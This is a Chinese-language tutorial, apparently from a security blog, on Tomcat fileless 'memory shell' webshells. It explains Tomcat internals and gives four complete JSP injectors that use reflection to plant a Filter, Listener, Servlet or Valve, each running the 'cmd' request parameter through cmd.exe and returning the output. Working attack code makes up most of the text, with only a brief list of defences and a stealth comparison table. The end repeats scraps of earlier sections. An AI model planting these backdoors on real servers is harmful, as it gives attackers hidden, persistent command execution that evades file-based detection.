Tomcat内存马攻击技术深入研究<\/h1>

1. 简介<\/h2>
Tomcat内存马（Tomcat Memory Shell）是一种利用Apache Tomcat服务器漏洞将恶意代码注入Tomcat进程内存中的攻击技术。这种攻击方式不需要在磁盘上写入文件，具有高度隐蔽性，能够绕过传统文件检测机制。<\/p>

2. 环境要求<\/h2>

操作系统：Windows 10<\/li>
Tomcat版本：9.0.73<\/li>

JDK版本：1.8.0_66<\/li> <\/ul>

3. Tomcat配置文件解析机制<\/h2>

Tomcat在启动时会解析配置文件，主要流程如下：<\/p>

从StandardContext<\/code>类的startInternal<\/code>方法开始<\/li>
调用fireLifecycleEvent<\/code>方法触发配置事件<\/li>
通过ContextConfig<\/code>类的configureStart<\/code>方法调用webConfig<\/code>方法<\/li>
webConfig<\/code>方法合并Tomcat全局web.xml、应用web.xml、web-fragment.xml和注解配置信息<\/li>

调用configureContext<\/code>方法将解析出的配置信息关联到Context对象<\/li>
<\/ol>
关键方法调用栈：<\/p>
configureContext:1447, ContextConfig (org.apache.catalina.startup)
webConfig:1330, ContextConfig (org.apache.catalina.startup)
configureStart:987, ContextConfig (org.apache.catalina.startup)
lifecycleEvent:304, ContextConfig (org.apache.catalina.startup)
fireLifecycleEvent:123, LifecycleBase (org.apache.catalina.util)
startInternal:4851, StandardContext (org.apache.catalina.core)
<\/code><\/pre>
4. Filter内存马技术<\/h2>
4.1 Filter基础示例<\/h3>
一个简单的Filter实现：<\/p>
@WebFilter<\/span>(<\/span>value =<\/span> "\/hello"<\/span>,<\/span> filterName =<\/span> "hello"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> HelloFilter<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig filterConfig)<\/span> throws<\/span> ServletException {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"filter init"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain)<\/span> 
<\/span><\/span>        throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"do filter"<\/span>);<\/span>
<\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> destroy<\/span>()<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"filter destroy"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 Filter注册流程<\/h3>
动态添加Filter的过程：<\/p>

调用ApplicationContext<\/code>的addFilter<\/code>方法创建FilterDef<\/code>对象<\/li>
调用StandardContext<\/code>的filterStart<\/code>方法得到filterConfigs<\/code><\/li>
调用ApplicationFilterRegistration<\/code>的addMappingForUrlPatterns<\/code>生成filterMaps<\/code><\/li>
<\/ol>
关键点：<\/p>

可以通过手动修改filterMaps<\/code>顺序或调用addFilterMapBefore<\/code>将自定义filter放在第一位<\/li>
需要构建filterDefs<\/code>、filterMaps<\/code>、filterConfigs<\/code>三个关键变量<\/li>
<\/ul>
4.3 Filter触发流程<\/h3>
调用栈分析：<\/p>
doFilter:16, HelloFilter (org.example.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
invoke:167, StandardWrapperValve (org.apache.catalina.core)
...
<\/code><\/pre>
关键步骤：<\/p>

StandardWrapperValve.invoke<\/code>方法构建filterChain<\/li>
调用filterChain的doFilter<\/code>方法<\/li>
遍历filterChain中的FilterConfig，获取Filter并调用其doFilter<\/code>方法<\/li>
<\/ol>
4.4 Filter内存马实现<\/h3>
完整JSP内存马示例：<\/p>
<%@ page import="java.util.Map,java.io.IOException,org.apache.tomcat.util.descriptor.web.*,org.apache.catalina.*,java.lang.reflect.*" %>
<%!
    public class MyFilter implements Filter {
        public void init(FilterConfig config) throws ServletException {}
        
        public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) 
            throws IOException, ServletException {
            HttpServletRequest request = (HttpServletRequest) req;
            if(request.getParameter("cmd") != null) {
                byte[] bytes = new byte[1024];
                Process process = new ProcessBuilder("cmd", "\/C", request.getParameter("cmd")).start();
                int len = process.getInputStream().read(bytes);
                resp.getWriter().write(new String(bytes, 0, len));
                process.destroy();
                return;
            }
            chain.doFilter(req,resp);
        }
        
        public void destroy() {}
    }
%>

<%
    \/\/ 获取StandardContext
    ServletContext servletContext = request.getSession().getServletContext();
    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    \/\/ 检查是否已存在
    String filterName = "evilFilter";
    if (standardContext.findFilterDef(filterName) == null) {
        \/\/ 创建FilterDef
        FilterDef filterDef = new FilterDef();
        filterDef.setFilterName(filterName);
        filterDef.setFilterClass(MyFilter.class.getName());
        filterDef.setFilter(new MyFilter());
        
        \/\/ 添加到filterDefs
        standardContext.addFilterDef(filterDef);
        
        \/\/ 创建FilterMap
        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("\/*");
        filterMap.setFilterName(filterName);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());
        
        \/\/ 添加到filterMaps第一位
        standardContext.addFilterMapBefore(filterMap);
        
        \/\/ 创建FilterConfig
        Constructor constructor = ApplicationFilterConfig.class
            .getDeclaredConstructor(Context.class, FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor
            .newInstance(standardContext, filterDef);
        
        \/\/ 添加到filterConfigs
        Field configs = standardContext.getClass().getDeclaredField("filterConfigs");
        configs.setAccessible(true);
        Map filterConfigs = (Map) configs.get(standardContext);
        filterConfigs.put(filterName, filterConfig);
        
        out.println("Inject Success!");
    }
%>
<\/code><\/pre>
5. Listener内存马技术<\/h2>
5.1 Listener类型<\/h3>
常用监听器：<\/p>

ServletContextListener<\/code>：监听Servlet上下文创建\/销毁<\/li>
ServletContextAttributeListener<\/code>：监听Servlet上下文属性变化<\/li>
ServletRequestListener<\/code>：监听Request请求创建\/销毁<\/li>
ServletRequestAttributeListener<\/code>：监听Request属性变化<\/li>
HttpSessionListener<\/code>：监听Session状态<\/li>
HttpSessionAttributeListener<\/code>：监听Session属性变化<\/li>
<\/ul>
5.2 Listener流程分析<\/h3>
关键点：<\/p>

监听器存储在applicationEventListenersList<\/code>属性中<\/li>
可通过addApplicationEventListener<\/code>或setApplicationEventListeners<\/code>方法添加监听器<\/li>
事件对象通过ServletRequestEvent<\/code>构造<\/li>
<\/ul>
5.3 Listener内存马实现<\/h3>
JSP内存马示例：<\/p>
<%@ page import="java.io.*,java.lang.reflect.*,org.apache.catalina.*" %>
<%!
    public class MyListener implements ServletRequestListener {
        public void requestDestroyed(ServletRequestEvent sre) {
            HttpServletRequest req = (HttpServletRequest) sre.getServletRequest();
            if (req.getParameter("cmd") != null) {
                try {
                    InputStream in = Runtime.getRuntime()
                        .exec(new String[]{"cmd.exe", "\/C", req.getParameter("cmd")})
                        .getInputStream();
                    Scanner s = new Scanner(in).useDelimiter("\\A");
                    String out = s.hasNext() ? s.next() : "";
                    
                    Field reqField = req.getClass().getDeclaredField("request");
                    reqField.setAccessible(true);
                    Request request = (Request) reqField.get(req);
                    request.getResponse().getWriter().write(out);
                } catch (Exception e) {}
            }
        }
        
        public void requestInitialized(ServletRequestEvent sre) {}
    }
%>

<%
    \/\/ 获取StandardContext
    Field reqField = request.getClass().getDeclaredField("request");
    reqField.setAccessible(true);
    Request req = (Request) reqField.get(request);
    StandardContext context = (StandardContext) req.getContext();
    
    \/\/ 添加监听器
    MyListener listener = new MyListener();
    context.addApplicationEventListener(listener);
    out.println("Inject Success!");
%>
<\/code><\/pre>
6. Servlet内存马技术<\/h2>
6.1 Servlet流程分析<\/h3>
关键方法：<\/p>

ApplicationContext.addServlet<\/code>：创建FilterDef<\/code>对象<\/li>
ApplicationServletRegistration.addMapping<\/code>：添加URL与Wrapper映射<\/li>
StandardContext.addServletMappingDecoded<\/code>：在servletMappings<\/code>中添加映射<\/li>
<\/ul>
6.2 Servlet内存马实现<\/h3>
JSP内存马示例：<\/p>
<%@ page import="java.io.*,javax.servlet.*,java.lang.reflect.*,org.apache.catalina.*" %>
<%!
    public class MyServlet extends HttpServlet {
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) 
            throws ServletException, IOException {
            if(req.getParameter("cmd") != null) {
                InputStream in = Runtime.getRuntime()
                    .exec(new String[]{"cmd.exe", "\/C", req.getParameter("cmd")})
                    .getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String out = s.hasNext() ? s.next() : "";
                resp.getWriter().write(out);
            }
        }
    }
%>

<%
    \/\/ 获取StandardContext
    ServletContext servletContext = request.getSession().getServletContext();
    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    \/\/ 检查是否已存在
    String servletName = "evilServlet";
    if(servletContext.getServletRegistration(servletName) == null) {
        \/\/ 创建Servlet
        MyServlet myServlet = new MyServlet();
        
        \/\/ 使用Wrapper封装
        Wrapper wrapper = standardContext.createWrapper();
        wrapper.setName(servletName);
        wrapper.setServletClass(myServlet.getClass().getName());
        wrapper.setServlet(myServlet);
        
        \/\/ 添加到children
        standardContext.addChild(wrapper);
        
        \/\/ 添加映射
        standardContext.addServletMappingDecoded("\/evil", servletName);
        out.println("Inject Success!");
    }
%>
<\/code><\/pre>
7. Valve内存马技术<\/h2>
7.1 Valve机制<\/h3>
Tomcat中的Pipeline-Valve机制：<\/p>

每个容器(Engine\/Host\/Context\/Wrapper)都有一个Pipeline<\/li>
Pipeline中包含多个Valve，最后一个为Basic Valve<\/li>
请求会依次通过各个Valve<\/li>
<\/ul>
7.2 Valve内存马实现<\/h3>
JSP内存马示例：<\/p>
<%@ page import="org.apache.catalina.valves.*,org.apache.catalina.connector.*,java.io.*,java.util.*,java.lang.reflect.*" %>
<%!
    public class MyValve extends ValveBase {
        public void invoke(Request request, Response response) throws IOException, ServletException {
            if(request.getParameter("cmd") != null) {
                InputStream in = Runtime.getRuntime()
                    .exec(new String[]{"cmd.exe", "\/C", request.getParameter("cmd")})
                    .getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String out = s.hasNext() ? s.next() : "";
                response.getWriter().write(out);
                return;
            }
            getNext().invoke(request, response);
        }
    }
%>

<%
    \/\/ 获取StandardContext
    ServletContext servletContext = request.getSession().getServletContext();
    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    \/\/ 添加Valve
    MyValve valve = new MyValve();
    standardContext.getPipeline().addValve(valve);
    out.println("Inject Success!");
%>
<\/code><\/pre>
8. 防御措施<\/h2>

代码审计<\/strong>：检查是否有可疑的反射调用和动态类加载<\/li>
运行时监控<\/strong>：监控Tomcat内存中的filter\/listener\/servlet\/valve变化<\/li>
权限控制<\/strong>：限制上传和执行JSP文件的权限<\/li>
安全加固<\/strong>：

禁用不必要的功能<\/li>
及时更新Tomcat版本<\/li>
使用安全管理器<\/li>
<\/ul>
<\/li>
内存检测工具<\/strong>：使用专门的内存马检测工具定期扫描<\/li>
<\/ol>
9. 总结<\/h2>
Tomcat内存马攻击技术主要利用以下机制：<\/p>

通过反射获取和修改Tomcat核心组件<\/li>
动态注册恶意组件(Filter\/Listener\/Servlet\/Valve)<\/li>
利用Tomcat请求处理流程执行恶意代码<\/li>
<\/ol>
四种内存马对比：<\/p>



类型<\/th>
隐蔽性<\/th>
稳定性<\/th>
实现难度<\/th>
适用场景<\/th>
<\/tr>
<\/thead>


Filter<\/td>
高<\/td>
高<\/td>
中等<\/td>
最常用<\/td>
<\/tr>

Listener<\/td>
高<\/td>
中<\/td>
简单<\/td>
需要请求触发<\/td>
<\/tr>

Servlet<\/td>
中<\/td>
高<\/td>
简单<\/td>
需要特定URL访问<\/td>
<\/tr>

Valve<\/td>
最高<\/td>
最高<\/td>
复杂<\/td>
需要深入理解机制<\/td>
<\/tr>
<\/tbody>
<\/table>
理解这些技术原理不仅有助于防御，也能提升对Tomcat架构的深入认识。<\/p>

类型<\/th>	隐蔽性<\/th>	稳定性<\/th>	实现难度<\/th>	适用场景<\/th> <\/tr> <\/thead>
Filter<\/td>	高<\/td>	高<\/td>	中等<\/td>	最常用<\/td> <\/tr>
Listener<\/td>	高<\/td>	中<\/td>	简单<\/td>	需要请求触发<\/td> <\/tr>
Servlet<\/td>	中<\/td>	高<\/td>	简单<\/td>	需要特定URL访问<\/td> <\/tr>
Valve<\/td>	最高<\/td>	最高<\/td>	复杂<\/td>	需要深入理解机制<\/td> <\/tr> <\/tbody> <\/table> 理解这些技术原理不仅有助于防御，也能提升对Tomcat架构的深入认识。<\/p>

Tomcat内存马攻击技术深入研究<\/h1>

1. 简介<\/h2> Tomcat内存马（Tomcat Memory Shell）是一种利用Apache Tomcat服务器漏洞将恶意代码注入Tomcat进程内存中的攻击技术。这种攻击方式不需要在磁盘上写入文件，具有高度隐蔽性，能够绕过传统文件检测机制。<\/p>

4. Filter内存马技术<\/h2>

5. Listener内存马技术<\/h2>

6. Servlet内存马技术<\/h2>

7. Valve内存马技术<\/h2>

1. 简介<\/h2>
Tomcat内存马（Tomcat Memory Shell）是一种利用Apache Tomcat服务器漏洞将恶意代码注入Tomcat进程内存中的攻击技术。这种攻击方式不需要在磁盘上写入文件，具有高度隐蔽性，能够绕过传统文件检测机制。<\/p>